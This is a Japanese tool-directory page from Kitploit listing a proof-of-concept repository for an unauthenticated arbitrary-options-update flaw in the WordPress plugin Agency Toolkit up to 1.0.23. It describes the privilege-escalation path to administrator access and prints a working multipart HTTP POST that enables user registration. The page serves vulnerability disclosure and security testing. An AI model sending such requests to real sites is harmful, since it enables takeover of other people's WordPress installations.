Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
agency-toolkit-1023-missing-authorization-to-unauthenticated-arbitrary-options-update — Agency Toolkit <= 1.0.23 - Missing Authorization to Unauthenticated Arbitrary Options Update | Kitploit
ツール/GitHubGitHub/randomrobbiebf/agency-toolkit-1023-missing-authorization-to-unauthenticated-arbitrary-options-update
Authentication & AuthorizationPrivilege EscalationWeb Application Exploitation
GitHubrandomrobbiebf/agency-toolkit-1023-missing-authorization-to-unauthenticated-arbitrary-options-update

agency-toolkit-1023-missing-authorization-to-unauthenticated-arbitrary-options-update

Agency Toolkit <= 1.0.23 - Missing Authorization to Unauthenticated Arbitrary Options Update

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
1年前未レビュー

NoCVE

Agency Toolkit <= 1.0.23 - 認可の欠如による未認証の任意オプション更新

説明

WordPress用プラグインAgency Toolkitは、1.0.23までの全バージョンにおいて、'agency_toolkit_import'アクションに対する権限チェックが欠如しているため、データの不正な変更に対して脆弱であり、権限昇格につながる可能性があります。これにより、認証されていない攻撃者がWordPressサイト上の任意のオプションを更新できる可能性があります。これを利用して、ユーザー登録時のデフォルトロールを管理者に更新し、ユーザー登録を有効にすることで、攻撃者は脆弱なサイトへの管理者アクセス権を取得できます。

詳細

  • タイプ: プラグイン
  • スラッグ: agency-toolkit
  • 影響を受けるバージョン: <= 1.0.23
  • CVSSスコア: 9.8
  • CVSSレーティング: 緊急
  • CVSSベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: N/A
  • ステータス: アクティブ

POC

root@kitploit:~
POST /wp-admin/admin.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123
Content-Length: 485

------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="agency_toolkit_import"

1
------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="import_file"; filename="settings.json"
Content-Type: application/json

[
   
    {
        "option_name": "users_can_register",
        "option_value": "1"
    }
]
------WebKitFormBoundaryABC123--
ツールをダウンロード